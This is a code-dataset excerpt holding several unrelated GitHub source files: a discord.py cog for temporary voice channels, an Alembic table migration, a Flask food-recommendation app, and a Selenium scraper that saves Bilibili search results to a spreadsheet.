temporary_channel_data[\"creator\"] in self.channel_creators.keys():\n channel_creator = self.channel_creators[temporary_channel_data[\"creator\"]]\n temporary_channel = TemporaryChannel(self, channel_creator,\n temporary_channel_data[\"index\"], channel_creator.create_category,\n channel_creator.create_name, channel_creator.create_user_limit,\n channel)\n await temporary_channel.ready.wait()\n channel_creator.register_temporary_channel(temporary_channel, dump=False)\n\n async def load_from_json(self):\n await self.load_channel_creators_from_json()\n await self.load_temporary_channels_from_json()\n\n self.dump_temporary_channels()\n self.dump_channel_creators()\n\n async def get_temporary_channel(self, interaction: discord.Interaction) -> Optional[TemporaryChannel]:\n voice_state = interaction.user.voice\n if not voice_state:\n await interaction.response.send_message(\"You are not in a voice channel.\", ephemeral=True)\n return None\n\n in_channel = voice_state.channel\n try:\n return self.all_temporary_channels[in_channel.id]\n except KeyError:\n await interaction.response.send_message(\"You are not in a temporary voice channel.\", ephemeral=True)\n return None\n\n async def do_limit_command(self, interaction: discord.Interaction, size, message):\n temporary_channel = await self.get_temporary_channel(interaction)\n if not temporary_channel:\n return\n\n if size == 0:\n size = None\n elif size < 0:\n await interaction.response.send_message(\"Cannot set negative channel size.\", ephemeral=True)\n return\n\n await temporary_channel.edit(user_limit=size)\n\n await interaction.response.send_message(message % (temporary_channel.channel.mention, size or \"unlimited\"))\n\n async def check_joined_creator_channel(self, user, channel_moved_to):\n if channel_moved_to.channel is None:\n return\n\n try:\n joined_channel_creator = self.channel_creators[channel_moved_to.channel.id]\n except KeyError:\n return\n\n new_temporary_channel = await joined_channel_creator.create_temporary_channel()\n await new_temporary_channel.ready.wait()\n await user.move_to(new_temporary_channel.channel)\n\n async def check_left_temporary_channel(self, channel_moved_from):\n if channel_moved_from.channel is None:\n return\n\n try:\n left_temp_channel = self.all_temporary_channels[channel_moved_from.channel.id]\n except KeyError:\n return\n\n voice_states = channel_moved_from.channel.voice_states\n if len(voice_states) == 0:\n await left_temp_channel.delete()\n\n @commands.Cog.listener()\n async def on_voice_state_update(self, user, before, after):\n if before.channel == after.channel:\n return\n await self.check_joined_creator_channel(user, after)\n await self.check_left_temporary_channel(before)\n\n def create_command_groups(self):\n self.voice_creator_commands = app_commands.Group(name=\"voicecreator\",\n description=\"Incremental Channel Creator Commands.\",\n guild_only=True,\n default_permissions=discord.Permissions(manage_channels=True))\n self.created_channel_commands = app_commands.Group(name=\"voice\",\n description=\"Created Channel Commands.\",\n guild_only=True)\n\n self.__cog_app_commands__.append(self.voice_creator_commands)\n self.__cog_app_commands__.append(self.created_channel_commands)\n\n def register_voice_creator_commands_to_group(self):\n @self.voice_creator_commands.command(name=\"create\")\n @app_commands.rename(category=\"creator_category\",\n create_name=\"created_name\",\n create_category=\"created_category\")\n async def _create_channel_creator(interaction: discord.Interaction,\n name: str,\n category: Optional[discord.CategoryChannel] = None,\n create_name: Optional[str] = None,\n create_category: Optional[discord.CategoryChannel] = None,\n user_limit: Optional[int] = None):\n \"\"\"Create an incremental channel creator.\n\n Parameters\n ----------\n interaction : discord.Interaction\n The interaction object.\n name : str\n Name of channel creator.\n category : Optional[discord.CategoryChannel]\n Category to place creator into.\n create_name : Optional[str]\n Name of created temporary channels.\n create_category : Optional[discord.CategoryChannel]\n Category of created temporary channels.\n user_limit : Optional[int]\n User limit of created temporary channels.\n \"\"\"\n new_channel_creator_channel = await interaction.guild.create_voice_channel(name=name, category=category)\n self.channel_creators[new_channel_creator_channel.id] = ChannelCreator(self,\n new_channel_creator_channel,\n create_name or name,\n create_category or category,\n user_limit)\n self.dump_channel_creators()\n await interaction.response.send_message(\n f\"Created new incremental channel creator {new_channel_creator_channel.mention} successfully.\")\n\n @self.voice_creator_commands.command(name=\"delete\")\n async def _delete_channel_creator(interaction: discord.Interaction,\n channel: discord.VoiceChannel):\n \"\"\"Delete an incremental channel creator.\n\n Parameters\n ----------\n interaction : discord.Interaction\n The interaction object.\n channel : discord.VoiceChannel\n Incremental voice channel creator to delete.\n \"\"\"\n\n if channel.id not in self.channel_creators.keys():\n await interaction.response.send_message(\n f\"{channel.mention} is not an incremental voice channel creator.\")\n return\n\n await self.channel_creators[channel.id].delete()\n await interaction.response.send_message(\n f\"Successfully deleted incremental voice channel creator with ID `{channel.id}`\")\n\n @self.voice_creator_commands.command(name=\"edit\")\n @app_commands.rename(create_name=\"created_name\",\n create_category=\"created_category\")\n async def _edit_channel_creator(interaction: discord.Interaction,\n channel: discord.VoiceChannel,\n create_name: Optional[str] = None,\n create_category: Optional[discord.CategoryChannel] = None,\n user_limit: Optional[int] = None):\n \"\"\"Edit an incremental channel creator.\n\n Parameters\n ----------\n interaction : discord.Interaction\n The interaction object.\n channel : discord.VoiceChannel\n Incremental voice channel creator to edit.\n create_name : Optional[str]\n Name of created temporary channels.\n create_category : Optional[discord.CategoryChannel]\n Category of created temporary channels.\n user_limit : Optional[int]\n User limit of created temporary channels.\n \"\"\"\n if channel.id not in self.channel_creators.keys():\n await interaction.response.send_message(f\"{channel.mention} is not an incremental voice channel creator.\")\n return\n\n channel_creator = self.channel_creators[channel.id]\n await channel_creator.edit(create_name, create_category, user_limit)\n await interaction.response.send_message(\n f\"Successfully edited incremental channel creator {channel_creator.channel.mention}\")\n\n def register_created_channel_commands_to_group(self):\n @self.created_channel_commands.command(name=\"resize\")\n @app_commands.checks.cooldown(2, 60)\n async def _resize(interaction: discord.Interaction,\n size: int):\n \"\"\"Resize your voice channel.\n\n Parameters\n ----------\n interaction : discord.Interaction\n The interaction object.\n size : int\n Number of users allowed in the channel.\n \"\"\"\n await self.do_limit_command(interaction, size, \"Successfully set %s size to `%s`\")\n\n @self.created_channel_commands.command(name=\"limit\")\n @app_commands.checks.cooldown(2, 60)\n async def _limit(interaction: discord.Interaction,\n limit: int):\n \"\"\"Apply a user limit to your voice channel. 0 removes the limit.\n\n Parameters\n ----------\n interaction : discord.Interaction\n The interaction object.\n limit : int\n Number of users allowed in the channel.\n \"\"\"\n await self.do_limit_command(interaction, limit, \"Successfully limited %s to `%s`\")\n\n @self.created_channel_commands.command(name=\"unlimit\")\n @app_commands.checks.cooldown(2, 60)\n async def _unlimit(interaction: discord.Interaction):\n \"\"\"Unlimit your voice channel.\"\n\n Parameters\n ----------\n interaction : discord.Interaction\n The interaction object.\n \"\"\"\n temporary_channel = await self.get_temporary_channel(interaction)\n if not temporary_channel:\n return\n\n await temporary_channel.edit(user_limit=None)\n\n await interaction.response.send_message(f\"Successfully unlimited {temporary_channel.channel.mention}\")\n\n @self.created_channel_commands.command(name=\"rename\")\n @app_commands.checks.cooldown(2, 60)\n async def _rename(interaction: discord.Interaction,\n name: str):\n \"\"\"Rename your voice channel.\n\n Parameters\n ----------\n interaction : discord.Interaction\n The interaction object.\n name : str\n New name of the channel.\n \"\"\"\n temporary_channel = await self.get_temporary_channel(interaction)\n if not temporary_channel:\n return\n\n if re.match(r\"#\\d+\", name.lower().removeprefix(temporary_channel.creator.create_name.lower()).strip()):\n await interaction.response.send_message(\"Please don't use misleading channel names.\", ephemeral=True)\n return\n\n await temporary_channel.edit(name=name)\n\n await interaction.response.send_message(f\"Successfully renamed {temporary_channel.channel.mention}\")\n\n\nclass ChannelCreator:\n def __init__(self, cog: SquadVoice, channel: discord.VoiceChannel, create_name: str,\n create_category: discord.CategoryChannel = None, create_user_limit: int = None):\n self.cog = cog\n self.channel = channel\n self.create_name = create_name\n self.create_category = create_category\n self.create_user_limit = create_user_limit\n self.created_channels = {}\n self.used_indexes = set()\n\n async def delete(self):\n cache = self.created_channels.copy().values()\n for created_channel in cache:\n await created_channel.delete(dump=False)\n self.cog.dump_temporary_channels()\n del cache\n\n await self.channel.delete()\n\n del self.cog.channel_creators[self.channel.id]\n self.cog.dump_channel_creators()\n\n def get_minimum_unused_index(self):\n if len(self.used_indexes) == 0:\n return 1\n minval, maxval = min(self.used_indexes), max(self.used_indexes)\n if len(self.used_indexes) < maxval - minval + 1:\n return min(set(range(minval, maxval + 1)) - self.used_indexes)\n else:\n return len(self.used_indexes) + 1\n\n async def create_temporary_channel(self):\n index = self.get_minimum_unused_index()\n temporary_channel = TemporaryChannel(self.cog, self, index, self.create_category,\n self.create_name, self.create_user_limit)\n await temporary_channel.ready.wait()\n self.register_temporary_channel(temporary_channel)\n\n return temporary_channel\n\n def register_temporary_channel(self, temporary_channel, dump=True):\n self.used_indexes.add(temporary_channel.index)\n self.created_channels[temporary_channel.channel.id] = temporary_channel\n self.cog.all_temporary_channels[temporary_channel.channel.id] = temporary_channel\n if dump:\n self.cog.dump_temporary_channels()\n\n async def edit(self, create_name: str = None, create_category: discord.CategoryChannel = None,\n create_user_limit: int = False):\n changed = False\n if create_name is not None:\n self.create_name = create_name\n changed = True\n\n if create_user_limit is not None:\n if create_user_limit <= 0:\n self.create_user_limit = None\n else:\n self.create_user_limit = int(create_user_limit)\n changed = True\n\n if create_category is not None:\n self.create_category = create_category\n\n changed = True\n\n if changed:\n for _, temporary_channel in sorted(self.created_channels.items()):\n await temporary_channel.edit(name=self.create_name, category=self.create_category,\n user_limit=self.create_user_limit)\n\n\nclass TemporaryChannel:\n def __init__(self, cog: SquadVoice, creator: ChannelCreator, index: int,\n category: discord.CategoryChannel, name: str, user_limit: Optional[int] = None,\n channel: discord.VoiceChannel = None):\n self.cog = cog\n self.creator = creator\n self.index = index\n self.name = name\n self.channel = channel\n self.category = category\n self.user_limit = user_limit\n self.edited_recently = defaultdict(lambda: False)\n self.ready = asyncio.Event()\n\n loop = asyncio.get_event_loop()\n loop.create_task(self.ready_up())\n\n async def ready_up(self):\n to_name = self.make_name()\n if not self.channel:\n guild = self.creator.channel.guild\n try:\n assert type(guild) is discord.Guild\n except AssertionError:\n guild = utils.get(self.cog.bot.guilds, id=guild.id)\n\n try:\n self.channel = await guild.create_voice_channel(to_name, category=self.category, user_limit=self.user_limit)\n except discord.HTTPException as error:\n if \"Category does not exist\" in str(error):\n self.creator.create_category = self.creator.channel.category\n self.category = self.creator.create_category\n self.channel = await guild.create_voice_channel(to_name, category=self.category, user_limit=self.user_limit)\n self.cog.dump_channel_creators()\n else:\n raise error\n\n self.ready.set()\n\n def make_edit_timer(self, time: int, property_name: str):\n async def _job():\n await asyncio.sleep(time)\n self.edited_recently[property_name] = False\n\n self.edited_recently[property_name] = bool(asyncio.create_task(_job()))\n\n def make_name(self):\n if self.name == self.creator.create_name:\n return f\"{self.name} #{str(self.index)}\"\n else:\n return self.name\n\n async def delete(self, dump=True):\n\n await self.channel.delete()\n\n self.creator.used_indexes.remove(self.index)\n\n del self.creator.created_channels[self.channel.id]\n del self.cog.all_temporary_channels[self.channel.id]\n if dump:\n self.cog.dump_temporary_channels()\n\n async def edit(self, index: int = None, category: discord.CategoryChannel = False, name: str = None,\n user_limit: Optional[int] or bool = False) -> None:\n\n changed = False\n if index:\n self.index = index\n changed = True\n\n if category or category is None:\n self.category = category\n changed = True\n\n if name:\n self.name = name\n changed = True\n\n if user_limit or user_limit is None:\n self.user_limit = user_limit\n changed = True\n\n if changed:\n await self.channel.edit(name=self.make_name(), category=self.category,\n user_limit=self.user_limit if self.user_limit is not None else 0)\n\n\nsetup = extension_setup(SquadVoice)\n", "repo_name": "Lordfirespeed/Centrifuge", "sub_path": "bot/cogs/squad_voice.py", "file_name": "squad_voice.py", "file_ext": "py", "file_size_in_byte": 22581, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "discord.ext.commands.Cog", "line_number": 15, "usage_type": "attribute"}, {"api_name": "discord.ext.commands", "line_number": 15, "usage_type": "name"}, {"api_name": "bot.common.GuildBot", "line_number": 20, "usage_type": "name"}, {"api_name": "bot.common", "line_number": 21, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 25, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 26, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 28, "usage_type": "name"}, {"api_name": "discord.app_commands.Group", "line_number": 28, "usage_type": "attribute"}, {"api_name": "discord.app_commands", "line_number": 28, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 29, "usage_type": "name"}, {"api_name": "discord.app_commands.Group", "line_number": 29, "usage_type": "attribute"}, {"api_name": "discord.app_commands", "line_number": 29, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 36, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 55, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 63, "usage_type": "call"}, {"api_name": "json.load", "line_number": 70, "usage_type": "call"}, {"api_name": "json.decoder", "line_number": 71, "usage_type": "attribute"}, {"api_name": "discord.NotFound", "line_number": 79, "usage_type": "attribute"}, {"api_name": "discord.NotFound", "line_number": 86, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 97, "usage_type": "call"}, {"api_name": "json.decoder", "line_number": 98, "usage_type": "attribute"}, {"api_name": "discord.VoiceChannel", "line_number": 105, "usage_type": "attribute"}, {"api_name": "discord.NotFound", "line_number": 106, "usage_type": "attribute"}, {"api_name": "discord.Interaction", "line_number": 127, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 127, "usage_type": "name"}, {"api_name": "discord.Interaction", "line_number": 140, "usage_type": "attribute"}, {"api_name": "discord.ext.commands.Cog.listener", "line_number": 181, "usage_type": "call"}, {"api_name": "discord.ext.commands.Cog", "line_number": 181, "usage_type": "attribute"}, {"api_name": "discord.ext.commands", "line_number": 181, "usage_type": "name"}, {"api_name": "discord.app_commands.Group", "line_number": 189, "usage_type": "call"}, {"api_name": "discord.app_commands", "line_number": 189, "usage_type": "name"}, {"api_name": "discord.Permissions", "line_number": 192, "usage_type": "call"}, {"api_name": "discord.app_commands.Group", "line_number": 193, "usage_type": "call"}, {"api_name": "discord.app_commands", "line_number": 193, "usage_type": "name"}, {"api_name": "discord.Interaction", "line_number": 205, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 207, "usage_type": "name"}, {"api_name": "discord.CategoryChannel", "line_number": 207, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 208, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 209, "usage_type": "name"}, {"api_name": "discord.CategoryChannel", "line_number": 209, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 210, "usage_type": "name"}, {"api_name": "discord.app_commands.rename", "line_number": 202, "usage_type": "call"}, {"api_name": "discord.app_commands", "line_number": 202, "usage_type": "name"}, {"api_name": "discord.Interaction", "line_number": 239, "usage_type": "attribute"}, {"api_name": "discord.VoiceChannel", "line_number": 240, "usage_type": "attribute"}, {"api_name": "discord.Interaction", "line_number": 263, "usage_type": "attribute"}, {"api_name": "discord.VoiceChannel", "line_number": 264, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 265, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 266, "usage_type": "name"}, {"api_name": "discord.CategoryChannel", "line_number": 266, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 267, "usage_type": "name"}, {"api_name": "discord.app_commands.rename", "line_number": 261, "usage_type": "call"}, {"api_name": "discord.app_commands", "line_number": 261, "usage_type": "name"}, {"api_name": "discord.Interaction", "line_number": 295, "usage_type": "attribute"}, {"api_name": "discord.app_commands.checks.cooldown", "line_number": 294, "usage_type": "call"}, {"api_name": "discord.app_commands.checks", "line_number": 294, "usage_type": "attribute"}, {"api_name": "discord.app_commands", "line_number": 294, "usage_type": "name"}, {"api_name": "discord.Interaction", "line_number": 310, "usage_type": "attribute"}, {"api_name": "discord.app_commands.checks.cooldown", "line_number": 309, "usage_type": "call"}, {"api_name": "discord.app_commands.checks", "line_number": 309, "usage_type": "attribute"}, {"api_name": "discord.app_commands", "line_number": 309, "usage_type": "name"}, {"api_name": "discord.Interaction", "line_number": 325, "usage_type": "attribute"}, {"api_name": "discord.app_commands.checks.cooldown", "line_number": 324, "usage_type": "call"}, {"api_name": "discord.app_commands.checks", "line_number": 324, "usage_type": "attribute"}, {"api_name": "discord.app_commands", "line_number": 324, "usage_type": "name"}, {"api_name": "discord.Interaction", "line_number": 343, "usage_type": "attribute"}, {"api_name": "re.match", "line_number": 358, "usage_type": "call"}, {"api_name": "discord.app_commands.checks.cooldown", "line_number": 342, "usage_type": "call"}, {"api_name": "discord.app_commands.checks", "line_number": 342, "usage_type": "attribute"}, {"api_name": "discord.app_commands", "line_number": 342, "usage_type": "name"}, {"api_name": "discord.VoiceChannel", "line_number": 368, "usage_type": "attribute"}, {"api_name": "discord.CategoryChannel", "line_number": 369, "usage_type": "attribute"}, {"api_name": "discord.CategoryChannel", "line_number": 415, "usage_type": "attribute"}, {"api_name": "discord.CategoryChannel", "line_number": 442, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 442, "usage_type": "name"}, {"api_name": "discord.VoiceChannel", "line_number": 443, "usage_type": "attribute"}, {"api_name": "collections.defaultdict", "line_number": 451, "usage_type": "call"}, {"api_name": "asyncio.Event", "line_number": 452, "usage_type": "call"}, {"api_name": "asyncio.get_event_loop", "line_number": 454, "usage_type": "call"}, {"api_name": "discord.Guild", "line_number": 462, "usage_type": "attribute"}, {"api_name": "discord.utils.get", "line_number": 464, "usage_type": "call"}, {"api_name": "discord.utils", "line_number": 464, "usage_type": "name"}, {"api_name": "discord.HTTPException", "line_number": 468, "usage_type": "attribute"}, {"api_name": "asyncio.sleep", "line_number": 481, "usage_type": "call"}, {"api_name": "asyncio.create_task", "line_number": 484, "usage_type": "call"}, {"api_name": "discord.CategoryChannel", "line_number": 503, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 504, "usage_type": "name"}, {"api_name": "bot.common.extension_setup", "line_number": 528, "usage_type": "call"}]} +{"seq_id": "15800119886", "text": "\"\"\"add tables\n\nRevision ID: d2615228dcac\nRevises: 32505b1f2d53\nCreate Date: 2023-05-04 08:52:41.545752\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'd2615228dcac'\ndown_revision = '32505b1f2d53'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('post',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('text', sa.String(length=255), nullable=False),\n sa.Column('author', sa.String(length=20), nullable=False),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('post_user_likes',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('user_id', sa.UUID(), nullable=True),\n sa.Column('post_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['post_id'], ['post.id'], ),\n sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('post_user_likes')\n op.drop_table('post')\n # ### end Alembic commands ###\n", "repo_name": "AVyha/social_network", "sub_path": "alembic/versions/d2615228dcac_add_tables.py", "file_name": "d2615228dcac_add_tables.py", "file_ext": "py", "file_size_in_byte": 1206, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "alembic.op.create_table", "line_number": 21, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 21, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 22, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 22, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 23, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 23, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 24, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 24, "usage_type": "call"}, {"api_name": "sqlalchemy.PrimaryKeyConstraint", "line_number": 25, "usage_type": "call"}, {"api_name": "alembic.op.create_table", "line_number": 27, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 27, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 28, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 28, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 29, "usage_type": "call"}, {"api_name": "sqlalchemy.UUID", "line_number": 29, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 30, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 30, "usage_type": "call"}, {"api_name": "sqlalchemy.ForeignKeyConstraint", "line_number": 31, "usage_type": "call"}, {"api_name": "sqlalchemy.ForeignKeyConstraint", "line_number": 32, "usage_type": "call"}, {"api_name": "sqlalchemy.PrimaryKeyConstraint", "line_number": 33, "usage_type": "call"}, {"api_name": "alembic.op.drop_table", "line_number": 40, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 40, "usage_type": "name"}, {"api_name": "alembic.op.drop_table", "line_number": 41, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 41, "usage_type": "name"}]} +{"seq_id": "71127997289", "text": "from flask import Flask, render_template, request\nimport pickle\nimport pandas as pd\n\n\napp = Flask(__name__)\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef Home():\n if request.method == 'POST':\n model = pickle.load(open('food_recommendation_model.pkl', 'rb'))\n calories = float(request.form[\"calories\"])\n carbohydrates = float(request.form['carbohydrates'])\n fats = float(request.form['fats'])\n protein = float(request.form['protein'])\n\n Measure = 0.25\n Grams = 1\n Calories = calories\n Protein = protein\n Fat = fats\n Sat_Fat = 0.102564103\n Fiber = 0.0\n Carbs = carbohydrates\n\n input_data = pd.DataFrame({\n 'Measure': [Measure],\n 'Grams': [Grams],\n 'Calories': [Calories],\n 'Protein': [Protein],\n 'Fat': [Fat],\n 'Sat.Fat': [Sat_Fat],\n 'Fiber': [Fiber],\n 'Carbs': [Carbs]\n })\n\n prediction = model.predict(input_data)\n\n food_dict = {\n 1: 'Breads, cereals, fastfood,grains (e.g., bread, rice, pasta)',\n 2: 'Meat, Poultry (e.g., chicken, beef, pork)',\n 3: 'Desserts, sweets (e.g., cookies, cakes, candies)',\n 4: 'Dairy products (e.g., milk, cheese, yogurt)',\n 5: 'Vegetables A-E (e.g., asparagus, broccoli, carrots)',\n 6: 'Vegetables R-Z (e.g., radishes, zucchini, squash)',\n 7: 'Fruits G-P (e.g., grapes, oranges, peaches)',\n 8: 'Fruits A-F (e.g., apples, bananas, cherries)',\n 9: 'Fish, Seafood (e.g., salmon, shrimp, tuna)',\n 10: 'Fats, Oils, Shortenings (e.g., butter, olive oil, lard)',\n 11: 'Vegetables F-P (e.g., fennel, lettuce, peppers)',\n 12: 'Seeds and Nuts (e.g., almonds, peanuts, sunflower seeds)',\n 13: 'Drinks,Alcohol, Beverages (e.g., water, soda, wine)',\n 14: 'Soups (e.g., chicken soup, tomato soup, vegetable soup)',\n 15: 'Fruits R-Z (e.g., raspberries, strawberries, watermelon)',\n 16: 'Jams,Jellies (e.g., strawberry jam, grape jelly, marmalade)'\n }\n\n if prediction[0] in food_dict:\n print(prediction[0])\n recommended_food_category = food_dict[prediction[0]]\n result = f\"The recommended food category is: {recommended_food_category}\"\n else:\n result = \"Sorry, we are not able to recommend a proper food category for this environment.\"\n\n # user_input = [Measure,Grams,Calories,Protein,Fat,Sat.Fat,Fiber,Carbs]\n # user_input = [0.25, 0.991, 0.665322581, 0.141630901,\n # 0.17167382, 0.153846154, 0, 0.203389831]\n\n result_html = process_user_input(result)\n\n return result_html\n return render_template('index.html')\n\n\ndef process_user_input(result):\n # Replace this with your actual data processing logic\n\n # Generate HTML for the results\n # result_html = '
    '\n # for item in result:\n # result_html += f'
  • {item}
  • '\n # result_html += '
'\n\n return '

'+result+'

'\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n", "repo_name": "Riya2812/NFC_CodeRunners", "sub_path": "run.py", "file_name": "run.py", "file_ext": "py", "file_size_in_byte": 3168, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.Flask", "line_number": 6, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 11, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 11, "usage_type": "name"}, {"api_name": "pickle.load", "line_number": 12, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 13, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 13, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 14, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 14, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 15, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 15, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 16, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 16, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 27, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 73, "usage_type": "call"}]} +{"seq_id": "29960524565", "text": "from selenium import webdriver\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.common.exceptions import TimeoutException\nimport xlwt\nimport bs4\nfrom selenium.webdriver.chrome.options import Options\n\n# 浏览器初始化\noptions = Options()\noptions.add_argument('--headless')\nbrowser=webdriver.Chrome(options=options)\nWAIT=WebDriverWait(browser,10)\nbrowser.set_window_size(1400, 900)\nbrowser.get('https://www.bilibili.com/')\n\n# 数据库初始化\n\ndef searchB(src):\n\n # 表格初始化(仅用于表格储存信息模式)\n book = xlwt.Workbook(src, style_compression=0)\n sheet = book.add_sheet(src, cell_overwrite_ok=True)\n sheet.write(0, 0, '名称')\n sheet.write(0, 1, '地址')\n sheet.write(0, 2, '描述')\n sheet.write(0, 3, '观看次数')\n sheet.write(0, 4, '弹幕数')\n sheet.write(0, 5, '发布时间')\n sheet.write(0, 6, 'Up主')\n n = 1\n\n\n def search():\n try:\n print(\"开始尝试访问b站...\")\n input = WAIT.until(EC.presence_of_element_located((By.CSS_SELECTOR, \"#nav_searchform > input\")))\n submit = WAIT.until(EC.element_to_be_clickable((By.CSS_SELECTOR, '#nav_searchform > div > button')))\n\n input.send_keys(src)\n submit.click()\n\n print(\"搜索成功,转到新窗口\")\n all_h = browser.window_handles\n browser.switch_to.window(all_h[1])\n getPage()\n\n total = WAIT.until(EC.presence_of_element_located((By.CSS_SELECTOR,\n '#all-list > div.flow-loader > div.page-wrap > div > ul > li.page-item.last > button'))).text\n print('总页数为' + total)\n return int(total)\n except TimeoutException:\n print('访问超时,尝试重新访问...')\n return search()\n\n def getPage():\n WAIT.until(EC.presence_of_element_located((By.CSS_SELECTOR, '#all-list > div.flow-loader > div.filter-wrap')))\n html = browser.page_source\n soup = bs4.BeautifulSoup(html, 'lxml')\n save_data_to_excel(soup)\n\n def save_data_to_excel(soup):\n list = soup.find(class_='video-list clearfix').find_all(class_='video-item matrix')\n for item in list:\n item_title = item.find('a').get('title')\n item_link = item.find('a').get('href')\n item_des = item.find(class_='des hide').text.strip()\n item_playtime = item.find(class_='so-icon watch-num').text.strip()\n if item_playtime.endswith('万'):\n item_playtime=float(item_playtime[:-1])*1000\n item_playtime=int(item_playtime)\n item_subtitle = item.find(class_='so-icon hide').text.strip()\n if item_subtitle.endswith('万'):\n item_subtitle=float(item_subtitle[:-1])*1000\n item_subtitle=int(item_subtitle)\n item_time = item.find(class_='so-icon time').text.strip()\n item_up = item.find(class_='up-name').text\n\n print(\"读取 | \" + item_title)\n nonlocal n\n\n sheet.write(n, 0, item_title)\n sheet.write(n, 1, item_link)\n sheet.write(n, 2, item_des)\n sheet.write(n, 3, item_playtime)\n sheet.write(n, 4, item_subtitle)\n sheet.write(n, 5, item_time)\n sheet.write(n, 6, item_up)\n\n n += 1\n\n def next_page(des_page):\n try:\n print('读取下一页...')\n next_btn = WAIT.until(EC.element_to_be_clickable((By.CSS_SELECTOR,\n '#all-list > div.flow-loader > div.page-wrap > div > ul > li.page-item.next > button')))\n next_btn.click()\n WAIT.until(EC.text_to_be_present_in_element((By.CSS_SELECTOR,\n '#all-list > div.flow-loader > div.page-wrap > div > ul > li.page-item.active > button'),\n str(des_page)))\n getPage()\n except TimeoutException:\n print('访问超时,尝试刷新中...')\n browser.refresh()\n next_page(des_page)\n\n total = search()\n\n for i in range(2, total + 1):\n next_page(i)\n\n browser.close()\n\n # 保存表格(仅用于表格存储时)\n book.save(src+'.xls')\n\nif __name__ =='__main__':\n src=input(\"请输入要搜索的内容:\")\n searchB(src)", "repo_name": "jingjiecb/PythonSpider", "sub_path": "learn/selenium/bilibili.py", "file_name": "bilibili.py", "file_ext": "py", "file_size_in_byte": 4575, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "selenium.webdriver.chrome.options.Options", "line_number": 11, "usage_type": "call"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 13, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 13, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.ui.WebDriverWait", "line_number": 14, "usage_type": "call"}, {"api_name": "xlwt.Workbook", "line_number": 23, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.presence_of_element_located", "line_number": 38, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 38, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 38, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 38, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.expected_conditions.element_to_be_clickable", "line_number": 39, "usage_type": "call"}, {"api_name": 